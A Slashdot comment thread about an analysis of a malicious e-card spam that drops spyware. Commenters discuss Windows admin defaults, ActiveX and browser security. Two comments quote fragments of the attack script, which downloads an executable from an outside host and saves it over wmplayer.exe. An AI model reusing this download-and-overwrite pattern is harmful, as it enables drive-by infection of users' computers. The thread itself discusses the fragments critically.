Malicious E-Cards - An Analysis of Spam
smashr writes "I ran across this article the other day which is a rather clear analysis of a piece of malicious spam the author received. While most of us simply hit the delete key, the author has taken the time to see exactly what is going on when an innocent user clicks on one of these fake e-cards that are going around. From Russian spyware sites to over-writing wmplayer.exe this particular piece of spam is a rather nasty one."
This definitely could be a nasty little thing, thanks to poor security on remote executables. Wouldn't modification of default internet security settings go a long way to resolve this particular instance? Of course as a Mac user I don't have much to worry about with this.
Does anyone else think that our society is overdue on becoming fed up with all these sort of things?
---
Mod me down, I'm already -1...woot!
Even if I knew that tomorrow the world would go to pieces, I would still plant my apple tree. -Martin Luther
This is a fascinating bit of detective work that should serve as a reminder to all careless users (especially Windows ones) that *SPAM IS NOT BENIGN*. It's not just annoying ads for penile implants--it can be downright dangerous to your PC.
Yes, but they do cost a person their time. Not very much, but I think it can be safely said that most e-cards are more fun to receive than normal greeting cards. And the quality of the e-card depends on how long the person has spent to pick it out.
1. It's viruses. 2. Yes, if the exploit in question has not yet been patched.
Does this stuff get treated like a virus/trojan, rather than legitimate business?
If that Osama Bin Laden AIM virus isn't a virus, then I don't know what is. Yet I don't see news stories about the FBI or SS arresting the people that wrote it, even though they are more or less out in the open.
It seems the rule lately is if you have a commercial intent, then it's OK for you to write viruses and trojans (like weatherbug).
People actually get pissed off when we tell them they can't have weatherbug on their computer.
I've had enough abrasive sigs. Kittens are cute and fuzzy.
The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure, or is it just that black hats like this are going after the 90%+ out there using MS products due to the size of opportunity?
Not trolling, just asking an honest question here.
Stop by my site where I write about ERP systems & more
1. Clicking can be dangerous.
2. If an operating system is that badly designed so one can actually overwrite an executable only by visiting a web page, than it's time to change the security settings.
Bite my shiny metal... oops... Nevermind!
It's an easy way to protect yourself from all sorts of stupid stuff.
Ahem, turn off HTML viewing in your email client NOW.
Here's what I do: Bitty Browser & Andromeda
This story is just more proof that people need to be proactive about their email and internet browsing habits. The biggest reason that so many people fall for this sort of crap is that they expect their computer to "Just Work", like their TV or microwave. It'd be nice if PCs DID Just Work, but unfortunately it's not the case. If more Windows users would just take the time to check out more secure browsers and email clients, and be more careful about which emails they open and attachments they download, spammers would have a much harder job. It sounds really obvious to anyone savvy enough to read Slashdot, but this really isn't something that occurs to 90% of the people who own a computer.
http://www.questionablecontent.net
I would love to eliminate it. To me, it's a complex engineering problem to get rid of it. The problem is presented as this:
- spam is cheap to produce
- a sucker is born every day
- even if 70% of the spam sent out doesn't get to it's destination, millions of messages will still be received
- spam filters are not installed on all mail servers
- spam is CHEAP to produce (again)
Cost is what stops junkmailers from filling postoffice mailboxes. Cost is the biggest barrier to preventing spam. It costs $0.20 to send a bulk mail item through the postoffice, it can get expensive if you want to send millions of junk mails.
How can email on the internet remain free/cheap and still not allow spam to run rampant?
http://github.com/gbook/nidb
Huh, so what if you are running has admin, why would I want a web page to overwrite .exe files without asking permission? In the race to keep up with Java some very unsafe things were done with ActiveX...
Onward to the Aether Sphere!
This looks pretty ugly:
.. ever </Comic book guy>
x.Open("GET", "http://adversting.co.uk/a.exe",0);
and should never have been implemented in a browser. After all, it's not a browsers task to launch files. I remember thinking this back when Windows Explorer and Internet Explorer merged into one (you can actually type URLs in your windows explorer window). <Comic book guy> Worst idea
Most windows users end up running as admin. Many windows programs need to be admin to run, and people get fed up with this, so they just run everyone as admin.
My wife had to use MS office for something, so I installed XP on one of my laptops for her. It wanted to add a user. I put her name in.
Gosh, whatya know...it made her an admin. Yeah, default behaviour. That's peachy. The problem is what the normal people will do.
for the normal user, the win98 lack of security has not changed in XP. Still there. And activeX is enabled by default as well.
Windows, through its near-global adoption and ease-of-use (you can argue the point, but as 98% of desktops are windows, it's a weak argument) has users of every technical ability. It has the users too dumb to use linux. Those guys are the ultimate trojan horse. They just sit there, willingly running anything given to them. It's akin to a dumbass in front of a linux machine, and someone tells them to type in "rm -rf /" as root. It's not the technology's fault, but the user's.
The reason we don't see as much of this happening on linux isn't solely due to the fact linux is more secure, but because what disruption would be caused by it? Making a linux virus isn't such an accolade as a Windows one, as you can bet it's not going to be on the news when released. The same goes for Macs. The most popular and wide-spread software is always the first to get its copy-protection removed, the first on FTP sites, and the first with known exploits.
Remember "security through obscurity"? Well, the reverse applies, too.
Actually, there are legitimate uses for ActiveX. One example being the Remote Desktop Web Client. It's a simple little ActiveX control that lets you log into your computer without having to install the terminal services client. While I would love to be able to get rid of that, it really isn't possible. The "engineer" where I work is a paranoid dolt who insists that no one should ever be allowed to install anything on any of the computers in the office (including popup killers...imagine the horror) and won't upgrade the machines (933mhz systems) to anything higher than Win98. Come to think of it, it's somewhat of a miracle that I can even remote into my system at all from there.
"So after all this, you make my case for me. To end this stalemate, you must die..."
And yet a person that has been surfing the web and using email for the past 6 or 7 years is still shocked when they click on Britney's Web Cam XXX HOT Pics and end up with a phone bill of $500 for dialing the Hot Russian Wives Club.
Well if Rise Of Nations((C) MS) would just run WITHOUT being an admin, id switch to a normal user in a blink..
"/Dread"
Okay, run as a Regular User under Win XP.
Watch as your McAfee antivirus now fails to autoupdate. Find out about it when all the users at your company get the latest virus because they are three months behind the update schedule.
Wheee!
Running as a "Regular user" does not work because too much common Windows software will not run properly under anything but "admin" rights.
They are spam harvesters. Nothing more.
I go to great lengths to avoid having my email reach spammer lists. But it only takes one person to screw that email address by submitting it to an e-card spammer.
Do I need to attach a note to my emails?
What possesses people to do it?
Are they too busy to write me something personal? Do they feel they cannot express their greeting in words? Do they not understand how to attach images? Maybe they actually hate me...
Bastards.
"The same thing can happen to an idiot running Mozilla under Linux as root,"
Except:
a) as far as I'm aware, most or all Linux distributions will create you a new non-admin user account rather than logging you on as a root user by default.
b) thanks to the wonder of modern miraculous setuid technology, there's no log on as root to run the majority of programs. About the only time I log on as root on Linux is to install apps or update kernels.
c) thanks to the wonder of modern miraculous 'su' technology, you can run as root in one window while logged on as your normal user account. As far as I'm aware, that's impossible in Windows, requiring you to log out and log back on as Administrator.
Those are just three reasons why most people run as Administrator on Windows and don't on Linux.
You seem to be missing the point. Browsers shouldn't allow this:
( "C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
x.Open("GET", "http://adversting.co.uk/a.exe",0);
s.SaveToFile
etc...
This is the problem with IE. Running as admin/root isn't a good idea in general, you are correct, but thats not an excuse for IE's pisspoor security.
# fuser -v
#
Security through obscurity never works
Hogwash. There are plenty of examples where "Security through obscurity" works just fine. Take, for example, Timothy McVeigh's execution. It took place in Indiana, but due to the large number of victims' families who wished to view the execution in Oklahoma, and who couldn't travel, the execution was broadcast via a closed-circuit satellite link to a gymnasium in Oklahoma. There was an extremely strong demand for the general public to tap into that feed. Hackers everywhere could have made an enormous name for themselves if they'd been able to intercept and decrypt that signal. But, since neither the specifics of the transmission of the signal, nor the encryption method used were ever made public, no one captured the signal, and a search for "Timothy McVeigh Execution" on Kazzaa returns 0 results. Security through obscurity worked in this example.
Here's another example. Do you have any idea about the internal layout of the Pentagon? Of course not. The floor plans are top secret. The locations of secret escape hallways are all top secret. The knowledge is "obscured." And consequently, the Pentagon has never been physically broken into. If all you naive "openness is more secure" zealots had your way, then the entire schematic of the Pentagon, Whitehouse, NORAD, and everything else would be all over the net, for us "White hats" to scrutinize and improve. Unfortunately, we'd all argue over what the "right" way to do things would be, and meanwhile, bin Laden's disciples would be delivering suicide-bomb-after-suicide-bomb to Bush's bedside.
I admit that "Security through obscurity" is not a silver bullet, and in many cases, is less desirable than open approaches. However, it is obvious that neither is your suggestion that open solutions are always best, correct. It should be clear to even the most fervent zealot that sometimes, a layer of obscurity is appropriate, and enhances the security of a situation that has already been thoroughly scrutinized by a variety of experts.
Like woodworking? Build your own picture frames.
Isn't it funny how we have people complaining how windows auto-update can download patches automatically into users machines and how this is dangerous but at the same time we blame these windows users for not updating their pcs. So when you have tens of millions of windows pcs would you rather MS update them automatically or not? This is problem a dumb question because I bet the /. crowd is divided on it as a matter of privacy and annoyance.
You know, that kind of assymetry shows up a few places in Windows, and it's always annoying.
Like, I think it's a File Replace dialog, "Yes" / "Yes to All" / "No" / "Cancel"
Why is there "No to All"? It's not quite as useful as "Yes to All", but you could easily think of some scenarios where you want to add in new files but don't want to try and overwrite any files that are already there...
SO YOU'RE GOING TO DIE: The Comic for Dealing with Death
You could just simply not view messages from people you don't know.
Otherwise known as a white list.
Yes, these work, but part of the utility of the email system is that you CAN get messages from unknown people. I read your email address at some interesting site (slashdot?) and I want to have a one2one conversation with you. So I send you an email. You don't know me from anyone, yet we can have a discussion about something without the entire world being privy to it.
And this is the real bad effect that SPAM has created. We no longer trust strangers.
Sigh...
- - - - - - - - - - -
I am a programmer. I am paid to produce syntax not grammar. Deal with it.
I don't think they want to make substantial changes. It's convenient for the user having everything on by default, new users having admin priviledges, and so on. Microsoft employs some very smart people. If the company was serious about good security, they could have changed things.
...that Microsoft really would like to change it. They're not exactly too happy about their reputation for spam etc. Then real issue is that consumers don't want security - oh they say they do but they don't. They just want to have their cake and eat it too.
But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.
Users expect being able to double-click a file and have an application run or install itself - yet they would like it not to happen when they do the exact same with a virus/trojan. They would like all their favorite programs to be allowed access the internet - and for all spyware/trojans to be blocked automatically. They would like for their files to be private - but not the hassle of identifying to the computer.
It's as if they expect the computer to be a fucking telepath with a mind-boggling good AI. The real truth is that most people don't understand a computer worth shit. Sec-uh-rity even less.
They're like a kid with a full chemistry set. They'll play around with it, and most of the time it's cool. Then they manage to make something toxic or explosive or worse, but somehow that's the chemistry set's fault and it simply shouldn't allow you to make anything dangerous.
But try suggesting to them up front that they should get a "Chemistry kit for Kids" or "Chemistry kit for dummies" where it's reaaaally hard to screw up and they'll complain their wits out that it doesn't do what they want and that they're ready for the real deal and that they know what they're doing.
So what do you do when grown men want to buy the full kit, even when you know it'll blow up in their faces? Refuse to sell it to them? Require a "driver's licence" of sorts? Don't tell me it'll all be better with Linux. Right now it's so hard, they won't use it at all, but by the time it gets easy enough that you expect everyone to manage their own desktop (as opposed to now, where you mostly need the local Linux guru), they will screw up their machines just as badly.
Kjella
Live today, because you never know what tomorrow brings
First, you seem to consider yourself an "average user" which, from your comments, I can assure you that you are not. You're more educated, more aware of what goes on with your computer than the average person at the keyboard.
I am not an expert in these things, so I won't bother to try to figure out how they can be done. I do know that much is possible. As an example, when I first left the BBS's and got on the internet I received an email warning me about an email going around that would wipe your hard drive clean if you opened it. I passed it on to my step-father, an engineer for the Navy working on a NASA base. He passed around and I received several replies from Navy, NASA, USGS and Air Force computer experts who told me not to worry because such a thing just wasn't possible. Do you agree with them today? 100 years ago most experts would have told you that landing on the moon was not possible. Nor was breaking the sound barrier. Please don't limit your imagination. I can assure you that the sick fscks out there aren't so limited.
Look beyond things transmitted by email. Every day people find flaws in your favorite operating systems including ways to gain root access and do as they please. And every day someone is fixing that kind of problem. Every day we learn something new which often requires us to change software and change the way we run it to improve security.
You sound very confident that you are secure, that it can't happen to you. I think you have a false sense of security. If you and your system were perfect, totally secure and immune to tampering by someone from the outside....well, you would have solved the problem for everyone. You'll be in high demand.
Oh, and about that plain text email....yeah, you do study all the source for your email reader before you compile it. Right?
. Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
There's also the little minor issue that even people on your whitelist can unknowingly send you malicious email.
:)
Realworld example: My sister (who, *if* I used a whitelist, would naturally be on it) added some downloaded toolbar to her browser, which in turn reformatted her email as it was being sent (she never saw the alterations)... and what I got in my mailbox was HTML formatted, with javascript that tried to fetch and install the same spyware toolbar (but was foiled by my braindead mail client).
And other folks on private mailing lists I'm on (which would also be whitelisted) have also unknowingly sent virus attachments. This happened on a mailing list populated by sysadmins, not exactly "regular users who don't know anything".
Crap, now I gotta go find another story to spend my mod points on
~REZ~ #43301. Who'd fake being me anyway?